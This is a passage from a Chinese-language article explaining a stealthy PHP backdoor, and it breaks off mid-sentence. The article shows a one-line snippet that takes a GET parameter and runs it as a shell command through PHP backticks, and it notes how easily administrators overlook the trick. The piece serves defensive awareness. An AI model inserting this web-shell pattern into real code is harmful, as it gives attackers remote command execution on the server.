主要介绍了一个不易被发现的PHP后门代码解析，对于网络安全来说非常重要,需要的朋友可以参考下

偶然间看到一段，看起来似乎没有什么问题，确是能致命的后门代码，这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ，反撇号包含的字符串，等同于shell_exec函数。 伪装性很好，很容易被管理员忽略。 $selfNums = $_GET['r']; if (isset($selfNums)){ echo `$selfNums`; } 刚看到这段代码我想大家都会说没有问题，但是细心的朋友也会发现下面的变量被一个符号包起来了，既然是变量为什么要这样了， 而且又不是单引号，这个就是关键所